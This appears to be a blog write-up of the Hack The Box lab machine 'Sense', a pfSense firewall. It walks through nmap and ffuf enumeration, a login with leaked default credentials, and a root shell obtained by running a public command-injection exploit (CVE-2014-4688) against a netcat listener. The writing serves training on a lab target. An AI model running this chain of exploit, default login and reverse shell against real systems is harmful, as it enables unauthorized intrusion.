This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.
You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.
Hello Everyone!
Today we are going to look the steps I followed to get root on Sense, a vulnerable machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.
Scanning and Enumeration
I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:
# Basic Nmap Scan
TGT=10.129.56.224
sudo nmap -sSVC $TGT
Host is up (0.087s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.129.59.115/
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
The nmap results plus a manual inspection showed the presence of Pfsense on ports 80 and 443, as well as Lighttpd version 1.4.35 on the same ports.
I checked for the pfsense default username/password combination plus some other default combinations but none of them worked.
To explore potential vulnerabilities, I used searchsploit
for both Pfsense and Lighttpd:
searchsploit pfsense | grep -v Cros
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
pfSense - (Authenticated) Group Member Remote Command Execut | unix/remote/43193.rb
pfSense 2.1 build 20130911-1816 - Directory Traversal | php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injecti | php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | php/webapps/39709.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit lighttpd
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC) | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Servic | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Exe | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Exe | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC) | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Se | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure | multiple/remote/8786.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Web Server Enumeration
Next, I initiated an ffuf scan to uncover hidden directories on the target web server:
wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -w $wordlist -u https://$TGT/FUZZ -e "/,.php,.txt" --replay-proxy http://127.0.0.1:8080
The ffuf scan revealed a file named /system-users.txt
through directory browsing. After inspecting its contents, I discovered the following information:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Exploiting Pfsense Vulnerability
Having this information, and knowing that Pfsense's default password is "pfsense" I connected to the Pfsense system using the credentials:
# Connecting with Pfsense
user: rohit
password: pfsense
Upon successful connection, I identified the Pfsense version as:
2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16
Now that I had a set of valid credentials I went back to the searchsploit results I revisited the "pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection" vulnerability and its corresponding exploit: https://www.exploit-db.com/exploits/43560
head 43560.py
#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
Exploitation and Root Access
The script exploited the vulnerability 'pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.' After setting up a listener, the script was executed to gain root access:
# Start Listener
nc -nlvp 7777
# Run Exploit
python /home/htb-ragab0t/43560.py --rhost $TGT --lhost $LHOST --lport 7777 --username rohit --password pfsense
The successful execution of the exploit granted root access to the target system:
# Confirming Root Access
whoami
root
# Checking User ID
id
uid=0(root) gid=0(wheel) groups=0(wheel)
And that's it for now. Until next time :)
~Ragab0t 🤖
PS: If you're eager to dive into the art of hacking techniques, I highly recommend joining me on Hack the Box Academy through my referral link. Let's level up our skills together. See you there!